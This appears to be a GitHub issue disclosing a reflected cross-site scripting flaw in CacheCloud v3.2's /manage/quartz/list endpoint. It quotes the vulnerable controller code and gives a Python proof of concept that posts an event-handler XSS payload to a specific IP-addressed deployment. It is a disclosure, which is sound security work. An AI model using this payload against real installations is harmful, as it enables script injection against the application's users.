XSS vulnerability on /manage/quartz/list

XSS vulnerability on /manage/quartz/list

## Summary

In the latest version (v3.2) of CacheCloud, the endpoint /manage/quartz/list does not encode user-controllable parameters when outputting them on web page, resulting in XSS vulnerability. This allows attackers to launch XSS attacks against users.


## Details

- SOURCE & SINK
```
// src/main/java/com/sohu/cache/web/controller/QuartzManageController.java#L26-L42
26:    @RequestMapping({"/list"})
27:    public ModelAndView doQuartzList(HttpServletRequest request, HttpServletResponse response, Model model) {
28:       String query = request.getParameter("query");
29:       List<TriggerInfo> triggerList;
30:       if (StringUtils.isBlank(query)) {
31:          triggerList = this.schedulerCenter.getAllTriggers();
32:          query = "";
33:       } else {
34:          triggerList = this.schedulerCenter.getTriggersByNameOrGroup(query);
35:       }
36: 
37:       model.addAttribute("triggerList", triggerList);
38:       model.addAttribute("quartzActive", SuccessEnum.SUCCESS.value());
39:       model.addAttribute("query", query);
40:       return new ModelAndView("manage/quartz/list");
41:    }
42:
```

## POC
```
import requests
from requests.sessions import Session
class CustomSession(Session):
    def request(
        self,
        method,
        url,
        params = None,
        data = None,
        headers = None,
        cookies = None,
        files = None,
        auth = None,
        timeout = None,
        allow_redirects = True,
        proxies = None,
        hooks = None,
        stream = None,
        verify = None,
        cert = None,
        json = None,
    ):
        arg_names = (
            'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
            'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
        )
        local_variables = locals()
        local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
        
        local_variables['headers'] = local_variables.get('headers') or dict()
        local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'})
        return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/manage/quartz/list'
payload = {'query': 'X" tabindex="1" auToFOcus onFOCuS=alert("zast-xss")//'}
response = requests.post(url, data=payload, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Text:', response.text)
# =================================== Poc End ====================================
```

- Screenshot

<img width="1860" height="532" alt="Image" src="https://github.com/user-attachments/assets/8b6abe8e-5ea2-4aed-b80e-6f7b27eaecf1" />

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

XSS vulnerability on /manage/quartz/list #376

Summary

Details

POC

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

XSS vulnerability on /manage/quartz/list #376

Description

Summary

Details

POC

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions